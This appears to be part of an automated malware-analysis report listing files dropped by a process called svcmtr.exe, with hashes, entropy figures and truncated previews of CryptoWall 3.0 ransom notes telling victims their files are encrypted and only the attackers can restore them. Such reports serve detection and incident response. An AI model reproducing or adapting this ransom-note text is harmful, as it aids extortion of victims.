                                                                                                                          SHA1:3D0CBA54D4496CF099B1E7528DC34CC3B70A51B5
                                                                                                                          SHA-256:8BEA187BD16E63483B2FA5BAA3FE611D6E1B2952CB403FCBBEE81C4D98E847EB
                                                                                                                          SHA-512:D57801ABA738C0A35A1C9BA4D52378FB51A4053EE014CEA0F864EF93F55399CAE2A4C62769A1DB4D7E9390C02846290EACAA7AA6A1449E19E15D641074038B63
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):139614
                                                                                                                          Entropy (8bit):7.998657178117629
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:QoQ/7sILmdqUVlxF8DHVpzT9Vd52vcd/ML3mSDhq2P21bn:Qajl/8DHVpzT9xWcdkL3mCT2d
                                                                                                                          MD5:77B6E03D5C36ACD556628F1E6CA2E217
                                                                                                                          SHA1:C9C6353B85460FFE2F9B4431167C3FDC6E3DE5D2
                                                                                                                          SHA-256:210D4BC307E0B0D8A78F552E54A5FBA6142EA4ED6CE91375AFF8063288986628
                                                                                                                          SHA-512:F7C4EDB9A9744E33BE08F6C368FDFFDED21EA760E186661C8D1B602173172DC8FE0BB1BD61AE1921246E47556691DD06C080DE309369F24C707AFABCFFC6DFD1
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):94878
                                                                                                                          Entropy (8bit):7.997962580304283
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:sm6Loj4bBllPXaPTHmRgMOgC47dJXCIXQiXougEABgx7T/yYmcz+kvfI:smUpbdXab6gMN7TCIXwugEcgx7TK4+ko
                                                                                                                          MD5:1DC74E633F81D13616F728732027F893
                                                                                                                          SHA1:0F113B850B56FA820908C1BB78F6D3AB670F124C
                                                                                                                          SHA-256:634B5C2DC25FAE3E653FA132A5CF36F63A8FDFD6216570CC2B22038890AAE6DD
                                                                                                                          SHA-512:8B4A6EC2FB4214C99AA41ECA263D03369F7A3FEF9C5DDE14CB1F00FE224F3950004BBEB3C4AF251858BB2C59A39362CADD19C6B50C2191CF6AE1CD8C79EB677E
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):238046
                                                                                                                          Entropy (8bit):7.999182213002957
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:6144:2Zm/ctnx6ARQEOoIcKrYeIDEu2M2Y7jbmvnHcCN:2Y06KQEXID0/Dp2MZPm1N
                                                                                                                          MD5:E33D8BB35F8206E9FEC679DCE5198902
                                                                                                                          SHA1:699F290DA94D14749CF09EFB882C2C9B6C599781
                                                                                                                          SHA-256:2BF5FFDF6C849942093343835BB7A68865E0C9D299795C5C09B15A41FCB6FB7C
                                                                                                                          SHA-512:96315A191B805AB97B36DEA8A53E6B3B8F8A0BC1E86E7DF4CA054B7B4145620EFD7E0FB5E38337ABE4EDE41D67AE344FA85F7F0D21377C8A311D115613B99AB1
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):112782
                                                                                                                          Entropy (8bit):7.998677666438719
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:IgHP0BNzrPhTHNUx+bG8wGOdMqYRK3ibtarQD:8NzrZTtTk5iBqQD
                                                                                                                          MD5:6F55A572F1094DB3F8B9514286E13AAA
                                                                                                                          SHA1:FF9D23673B0942AA35174420F1ECEAE45E19C0F7
                                                                                                                          SHA-256:6D9A58D3C6C690C94161A058D7CFA6746AF9A1C20F677232707ACC61947A0401
                                                                                                                          SHA-512:C98C8F53B185AEC9C0B3957008699DF62E14CE01AD352D6638B0B3B21D55A084BAE6AC1A6DE4A8C86917CCF3B5071629F8FA7BD3A734441678B46670CD390514
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):94878
                                                                                                                          Entropy (8bit):7.9980371289190595
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:VXe0033wVR6+Yi+qkoqEKDlKH7hb35MWTAmHpeI086c349ONHxGX/kfdTB4hv/YM:VuPn+0VivkHKZnx086f9ONHK/MBov//J
                                                                                                                          MD5:04A505AAE0DE54D383A2864C42ABF83B
                                                                                                                          SHA1:3ABE2BC6E2E127D61842614985AD80B662287896
                                                                                                                          SHA-256:73CF7FD7EB0EC82788AC290D39DB00181A7E01DD21C8B122D5D5B9051526436D
                                                                                                                          SHA-512:A31780406631D592E1E01A8EBF3EB5415F1F3AAD07F04A16817996F31878F5A1D6169AC9AB18120C565D22D3478B36073074989DD062B926FD41139F9CAACEE3
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):94878
                                                                                                                          Entropy (8bit):7.997887264203218
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:sii4M4pnwnv28C6yHLtK6Ph4ESaWYEb4pQI5xwJXXR08NuRknaS5wagDzo8INhV9:HnM4pwn+8CxZ1SaWYYl5hXm5SnaOrmol
                                                                                                                          MD5:A8163D261CB81067929DBE94A35AD098
                                                                                                                          SHA1:C4E5CE0656766325A8665C0A6015EB0A2664D2CC
                                                                                                                          SHA-256:DC5DDD6AB2104CE4A072A7344E54F7DC687E2C30B1E69747E11A4BC71C1006AF
                                                                                                                          SHA-512:DFB65AE0819FB30EFFD20524E8F43900ED743B2CF71A0788DECCA7AC097FF502D74EB7397B350D0543554D5BA161C4836BE5E431DFC0355DD148CA5151C14E45
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):139614
                                                                                                                          Entropy (8bit):7.9984534759836015
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:vh22Q3J5JRTIVgkG91y7ucbzqFQJ/fLG8KHRSz7MHpATIGP:vQjVIVKvy7ucBlfLhKEvDIGP
                                                                                                                          MD5:C492BDA69CD3F1D9EE4F0C66440A1F3B
                                                                                                                          SHA1:5C0802DB20057BDF31116A27C5939DD3B7C571B4
                                                                                                                          SHA-256:39921D8FBC985D583A162CD901C01127A6F295D23CDD870B93913FF9B86CB70D
                                                                                                                          SHA-512:AEF98D599D93A721954B7E2A981A98CAF31F95A93F5267A32510D281D1C75481CC440BEB2F5A9603E65F484844CDD3A4F861A288DC6C224973D72978167CA989
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):112782
                                                                                                                          Entropy (8bit):7.998461573117077
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:u3FTY8yOyHyG/k1quwoC3HzvfZXUhdipshyzIKtTKKnNuw4V8g+AJK3L9I3QAGcf:u1TxyFz/jU4HbW0psWpNdYoOKb9xncqu
                                                                                                                          MD5:759EEF7B3674F7598D102B009F80784D
                                                                                                                          SHA1:8DE5077188531546069A338F08E62312CA80B428
                                                                                                                          SHA-256:4509D90F70464C9676E1BDBD46F4AA67930093110D43554369B9F61BD2F13F4C
                                                                                                                          SHA-512:01D2C20D5620056B1615ADC3572EA576A7C077CE54080F274B0CB44C4E8D16A014B2156CE59178EF2B1EED6D35722BA4813ECD60E864AA1DBA763E18E7D57708
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):94878
                                                                                                                          Entropy (8bit):7.99809516643394
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:VcQ+4MY/mJtprGgbIkJ759IK22DGjjyD2jvRvD8SDmDs5HReTyWkDMvbt:VmlIrEbxfDj2ZjDDHETADu
                                                                                                                          MD5:0CD36C25DB63B55810F524E8FAA406EC
                                                                                                                          SHA1:49E3A02EE8CD437620DC0E5C855430B0697C45F3
                                                                                                                          SHA-256:511D8D70ED9CC9E6CBF5476FA3B79CD9417BA35780CD02C5FBB9251AF98771CA
                                                                                                                          SHA-512:F1D58D87CC940DB6BF5AFE06AB4F5FB40597357E93A7D40FC9C2A76136F55279E2CCE6A2222628B51A5971D975D2F4178D52C3030D4272FD392528082EDCA200
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
